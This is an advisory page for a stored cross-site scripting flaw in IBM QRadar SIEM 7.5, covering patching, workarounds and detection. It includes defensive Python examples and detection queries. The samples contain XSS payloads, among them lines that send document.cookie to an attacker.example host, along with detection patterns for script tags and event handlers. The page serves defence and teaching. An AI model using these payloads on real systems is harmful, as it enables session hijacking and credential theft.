CVE-2024-47107
📋 TL;DR
IBM QRadar SIEM 7.5 has a stored cross-site scripting (XSS) vulnerability: an authenticated user can inject arbitrary JavaScript into the web interface, and because the payload is stored by the application it executes later in the browser of every user who views the affected content, including administrators. A successful attack can disclose credentials or session tokens within a trusted session and perform actions with the victim's privileges. The prerequisite is a valid QRadar account (or a compromised one); the flaw is not reachable unauthenticated.
💻 Affected Systems
- IBM QRadar SIEM
📦 What is this software?
QRadar Security Information and Event Manager by IBM
View all CVEs affecting QRadar Security Information and Event Manager →
⚠️ Risk & Real-World Impact
Worst Case
A malicious insider, or an attacker holding a compromised low-privilege QRadar account, stores a payload that fires in an administrator's browser, harvests the admin session, and uses it to reconfigure the SIEM (log sources, rules, users) or pull collected event data. That is full control of the monitoring platform and of the visibility it provides.
Likely Case
An authenticated user with basic privileges stores a script that runs in other users' sessions, hijacking those sessions, performing actions as the victim, or reading data the victim is allowed to see.
If Mitigated
With the vendor fix applied, stored values are encoded on output and the payload renders as inert text. Until then, a strict Content Security Policy and tight control over who holds QRadar accounts shrink the blast radius but do not remove the flaw: the attacker still needs an account and must defeat those additional controls.
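The "input validation and output encoding" mentioned above is the generic fix for stored XSS. The following is an added illustration (not QRadar code, and not taken from the vendor fix) of the vulnerable rendering pattern beside its hardened form, using made-up stored field values. It also shows the edge case that output encoding alone does not cover: a javascript: URI placed in an href survives HTML escaping and needs a scheme allow-list.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample "stored" values, standing in for user-editable fields
# (a name, a free-text note, a link) that the UI later renders for other users.
STORED = {
    "name": "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
    "note": '" onmouseover="alert(document.cookie)',
    "link": "javascript:alert(document.domain)",
}


def render_vulnerable(record):
    """Vulnerable pattern: stored strings concatenated straight into HTML.
    Whatever the attacker saved is emitted verbatim and runs in every viewer's browser."""
    return (
        f'<li title="{record["note"]}">'
        f'<a href="{record["link"]}">{record["name"]}</a></li>'
    )


def safe_url(url):
    """HTML escaping does not neutralise a javascript: URI inside href,
    so URLs get a scheme allow-list instead of escaping alone (fails closed)."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_hardened(record):
    """Hardened form: HTML-escape every stored value for the context it lands in
    (quote=True also covers attribute values) and allow-list URL schemes."""
    esc = lambda s: html.escape(s, quote=True)
    return (
        f'<li title="{esc(record["note"])}">'
        f'<a href="{esc(safe_url(record["link"]))}">{esc(record["name"])}</a></li>'
    )


class _Audit(HTMLParser):
    """Parses rendered markup the way a browser tokenises it and records
    anything that executes script: script tags, on* handlers, javascript: URIs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            if name in ("href", "src") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URI in {name}")


def active_content(markup):
    """Return the list of script-executing constructs found in rendered markup."""
    parser = _Audit()
    parser.feed(markup)
    return parser.findings


if __name__ == "__main__":
    print("vulnerable:", active_content(render_vulnerable(STORED)))
    print("hardened:  ", active_content(render_hardened(STORED)))
```

The parser-based check is the useful part for a reviewer: it reports three separate script-executing constructs in the vulnerable output (the broken-out attribute, the javascript: link and the script element) and none in the hardened output, even though the hardened output still contains the attacker's text, now as data rather than markup.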
🎯 Exploit Status
Exploitation requires an authenticated QRadar account. Because the XSS is stored, the payload persists in the application and fires for every user who views the affected content, not only in the attacker's own session.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Apply IBM QRadar SIEM 7.5.3 Patch 11 or later (confirm the exact fix level against the vendor advisory below before downloading)
Vendor Advisory: https://www.ibm.com/support/pages/node/7178104
Restart Required: Yes
Instructions:
1. Back up the QRadar configuration (Admin > Backup and Recovery) before changing anything.
2. Download the fix from IBM Fix Central.
3. Apply it following IBM's installation guide for the update package.
4. Restart QRadar services when the installer requires it; schedule a maintenance window, since the console is unavailable during the restart.
🔧 Temporary Workarounds
Input Validation Enhancement
Where the product allows it, restrict which user-controllable fields are editable and by which roles. The input validation and output encoding that actually close the hole live in the vendor's code and ship with the fix; an operator cannot bolt them onto QRadar's web interface.
Content Security Policy
Apply a strict Content-Security-Policy header (no unsafe-inline in script-src) at a reverse proxy in front of the console to limit what injected markup can execute. Test it against a staging console first: a policy that blocks inline script the QRadar UI relies on will break legitimate pages.
🧯 If You Can't Patch
- Restrict user permissions and prune accounts: fewer authenticated users means fewer people able to store a payload, and fewer roles with edit rights on user-controllable fields
- Put a web application firewall in front of the console with rules for XSS payloads (script tags, on* event-handler attributes, javascript: URIs), including URL-encoded and double-encoded forms; treat this as a speed bump, not a fix
🔍 How to Verify
Check if Vulnerable:
Confirm the console version from the Help (?) menu > About in the web UI, or from the command line on the console host. Any 7.5 release earlier than the fixed level named in the advisory is affected.
Check Version:
ssh root@qradar-host /opt/qradar/bin/myver
Verify Fix Applied:
After patching, run the version check again and confirm the reported update level matches the advisory. Admin > System and License Management lists the version of every managed host, so check the whole deployment, not only the console.
📡 Detection & Monitoring
Log Indicators:
- Script tags, on* event-handler attributes, or javascript: URIs in values submitted to the console's web server, including URL-encoded or HTML-entity-encoded forms
- Repeated submissions of such payloads from a single account, which suggests an attacker iterating on a payload to get past filtering
Network Indicators:
- The same payload patterns in HTTP requests to the QRadar console; TLS must be terminated at a proxy or WAF for a network sensor to see them
SIEM Query:
The AQL below searches events already in QRadar. Replace devicetype 12 with the log source type ID of the log source that carries the console's web server access logs in your deployment; if those logs are not being ingested as events, the query has nothing to match. ILIKE is used because LIKE is case-sensitive, and the %3c pattern catches the URL-encoded form of an opening script tag.
SELECT starttime, sourceip, username, UTF8(payload) AS payload
FROM events
WHERE devicetype = 12
  AND (UTF8(payload) ILIKE '%<script%'
    OR UTF8(payload) ILIKE '%3cscript%'
    OR UTF8(payload) ILIKE '%javascript:%'
    OR UTF8(payload) ILIKE '%onerror=%'
    OR UTF8(payload) ILIKE '%onload=%')
LAST 24 HOURS
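A substring search like the one above misses payloads that are URL-encoded twice or hidden behind HTML entities. The following added example (my own code, not QRadar's or IBM's) scans web-server access-log lines offline: it decodes URL and entity encoding to a fixed point before matching, so the detector sees what the browser would see. The log lines are constructed for the demo and only imitate a common access-log shape; the field positions are an assumption, not the QRadar console's actual log format.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample lines in a generic access-log shape (not real QRadar logs).
# Index 1: URL-encoded <script>; index 2: double-encoded event handler;
# index 3: javascript: URI split with an HTML entity; 0 and 4 are benign.
SAMPLE_LINES = [
    '10.0.0.5 - alice [12/Jan/2025:10:01:02 +0000] "GET /console/qradar/jsp/QRadar.jsp HTTP/1.1" 200 8731',
    '10.0.0.6 - mallory [12/Jan/2025:10:02:15 +0000] "GET /console/do/save?description='
    '%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E'
    ' HTTP/1.1" 200 120',
    '10.0.0.7 - bob [12/Jan/2025:10:03:44 +0000] "GET /console/do/save?name=%2522%2520onerror%253Dalert%25281%2529 HTTP/1.1" 200 77',
    '10.0.0.9 - carol [12/Jan/2025:10:05:10 +0000] "GET /console/do/save?link=jav&#x61;script:alert(1) HTTP/1.1" 200 77',
    '10.0.0.5 - alice [12/Jan/2025:10:06:30 +0000] "GET /console/help/javascript_reference.html?version=7.5 HTTP/1.1" 200 4020',
]

# Indicator patterns applied to the fully decoded, lower-cased line.
INDICATORS = {
    "script tag": re.compile(r"<\s*script\b"),
    "event handler attribute": re.compile(r"\bon[a-z]+\s*="),
    "javascript: uri": re.compile(r"javascript\s*:"),
    "risky element": re.compile(r"<\s*(iframe|img|svg|object|embed)\b"),
}

# Assumed log shape: client - user [timestamp] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[')


def normalize(text, rounds=3):
    """Undo URL encoding and HTML entities repeatedly (bounded) until the text
    stops changing, so double-encoded payloads are matched in decoded form."""
    prev = None
    for _ in range(rounds):
        if text == prev:
            break
        prev = text
        text = html.unescape(unquote_plus(text))
    return text.replace("\x00", "").lower()


def indicators(line):
    """Return the names of every XSS indicator present in one log line."""
    decoded = normalize(line)
    return [name for name, pattern in INDICATORS.items() if pattern.search(decoded)]


def scan(lines):
    """Return (line index, user, indicator names) for each line that triggers."""
    hits = []
    for idx, line in enumerate(lines):
        found = indicators(line)
        if found:
            match = LOG_RE.match(line)
            user = match.group(2) if match else "-"
            hits.append((idx, user, found))
    return hits


if __name__ == "__main__":
    for idx, user, found in scan(SAMPLE_LINES):
        print(f"line {idx} user={user}: {', '.join(found)}")
```

The bounded decode loop is what makes the double-encoded line (index 2) visible; a single unquote would still show %22%20onerror and slip past the event-handler pattern. The last benign line is there to show that a page name containing "javascript" without a following colon, and a "version=" parameter, do not trip the patterns.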